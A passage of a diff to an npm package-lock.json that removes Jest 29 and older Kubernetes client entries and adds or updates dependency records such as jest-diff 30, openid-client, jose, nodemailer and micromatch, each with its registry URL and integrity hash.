"pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" + "has-symbols": "^1.0.3" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/@jest/reporters/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/@jest/reporters/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" + "function-bind": "^1.1.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" + "node": ">= 0.4" } }, - "node_modules/@jest/reporters/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", "dev": true, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14" } }, - "node_modules/@jest/reporters/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", "dev": true, + "license": "MIT", "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 12" } }, - "node_modules/@jest/reporters/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "node_modules/ip-address/node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "dev": true, + "license": "BSD-3-Clause" + }, + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" + "node": ">=0.12.0" } }, - "node_modules/@jest/reporters/node_modules/write-file-atomic": { + "node_modules/isomorphic-ws": { "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", + "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", + "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + "peerDependencies": { + "ws": "*" } }, - "node_modules/@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", + "node_modules/jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, + "license": "MIT", "dependencies": { - "@sinclair/typebox": "^0.25.16" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", + "node_modules/jest-diff/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" + "@sinclair/typebox": "^0.34.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", + "node_modules/jest-diff/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "license": "MIT" }, - "node_modules/@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", + "node_modules/jest-diff/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - }, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@jest/test-sequencer/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", + "node_modules/jest-diff/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@jest/test-sequencer/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "node_modules/jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", "dev": true, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@jest/test-sequencer/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "node_modules/jose": { + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@jest/test-sequencer/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true, + "license": "MIT" + }, + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" + "argparse": "^2.0.1" }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" + "bin": { + "js-yaml": "bin/js-yaml.js" } }, - "node_modules/@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", + "node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "dev": true, + "license": "MIT" + }, + "node_modules/jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", "dev": true, - "dependencies": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 10.16.0" } }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", + "node_modules/jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "dev": true, + "license": "MIT", "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" + }, + "bin": { + "jsonpath": "bin/jsonpath-cli.js", + "jsonpath-plus": "bin/jsonpath-cli.js" }, "engines": { - "node": ">=6.0.0" + "node": ">=18.0.0" } }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, + "node_modules/lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">= 0.4" } }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, + "license": "MIT", + "dependencies": { + "braces": "^3.0.3", + "picomatch": "^2.3.1" + }, "engines": { - "node": ">=6.0.0" + "node": ">=8.6" } }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", + "node_modules/micromatch/node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" + "license": "MIT", + "engines": { + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@kubernetes/client-node": { - "version": "0.18.1", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.18.1.tgz", - "integrity": "sha512-F3JiK9iZnbh81O/da1tD0h8fQMi/MDttWc/JydyUVnjPEom55wVfnpl4zQ/sWD4uKB8FlxYRPiLwV2ZXB+xPKw==", + "node_modules/mime-db": { + "version": "1.49.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", + "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime-types": { + "version": "2.1.32", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", + "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", "dependencies": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^18.11.17", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tmp-promise": "^3.0.2", - "tslib": "^2.4.1", - "underscore": "^1.13.6", - "ws": "^8.11.0" + "mime-db": "1.49.0" }, - "optionalDependencies": { - "openid-client": "^5.3.0" + "engines": { + "node": ">= 0.6" } }, - "node_modules/@kubernetes/client-node/node_modules/@types/node": { - "version": "18.13.0", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.13.0.tgz", - "integrity": "sha512-gC3TazRzGoOnoKAhUx+Q0t8S9Tzs74z7m0ipwGpSqQrleP14hKxP4/JUeEQcD3W1/aIpnWl8pHowI7WokuZpXg==" - }, - "node_modules/@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true, + "license": "MIT" }, - "node_modules/@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": "sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "dev": true, + "license": "MIT", "dependencies": { - "type-detect": "4.0.8" + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^2.0.0" + "node_modules/nodemailer": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz", + "integrity": "sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==", + "license": "MIT-0", + "engines": { + "node": ">=6.0.0" } }, - "node_modules/@types/babel__core": { - "version": "7.1.15", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.1.15.tgz", - "integrity": "sha512-bxlMKPDbY8x5h6HBwVzEOk2C8fb6SLfYQ5Jw3uBYuYF1lfWk/kbLd81la82vrIkBb0l+JdmrZaDikPrNxpS/Ew==", - "dev": true, + "node_modules/nunjucks": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/nunjucks/-/nunjucks-3.2.4.tgz", + "integrity": "sha512-26XRV6BhkgK0VOxfbU5cQI+ICFUtMLixv1noZn1tGU38kQH5A5nmmbk/O45xdyBhD1esk47nKrY0mvQpZIhRjQ==", "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" + "a-sync-waterfall": "^1.0.0", + "asap": "^2.0.3", + "commander": "^5.1.0" + }, + "bin": { + "nunjucks-precompile": "bin/precompile" + }, + "engines": { + "node": ">= 6.9.0" + }, + "peerDependencies": { + "chokidar": "^3.3.0" + }, + "peerDependenciesMeta": { + "chokidar": { + "optional": true + } } }, - "node_modules/@types/babel__generator": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.3.tgz", - "integrity": "sha512-/GWCmzJWqV7diQW54smJZzWbSFf4QYtF71WCKhcx6Ru/tFyQIY2eiiITcCAeuPbNSvT9YCGkVMqqvSk2Z0mXiA==", + "node_modules/oauth4webapi": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", + "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==", "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", "dev": true, "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" + "wrappy": "1" } }, - "node_modules/@types/babel__traverse": { - "version": "7.14.2", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.14.2.tgz", - "integrity": "sha512-K2waXdXBi2302XUdcHcR1jCeU0LL4TD9HRs/gk0N2Xvrht+G/BfJa4QObBQZfhMdxiCpV3COl5Nfq4uKTeTnJA==", + "node_modules/openid-client": { + "version": "6.6.2", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", + "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.3.0" + "jose": "^6.0.11", + "oauth4webapi": "^3.5.4" + }, + "funding": { + "url": "https://github.com/sponsors/panva" } }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true, + "license": "ISC" + }, + "node_modules/proxy-from-env": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", + "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" }, - "node_modules/@types/graceful-fs": { - "version": "4.1.5", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.5.tgz", - "integrity": "sha512-anKkLmZZ+xm4p8JWBf4hElkM4XR+EZeA2M9BAkkTldmcyDY4mbdIJnRghDJH3Ov5ooY7/UAoENtmdMSkaAd7Cw==", + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "dev": true, + "license": "MIT", "dependencies": { - "@types/node": "*" + 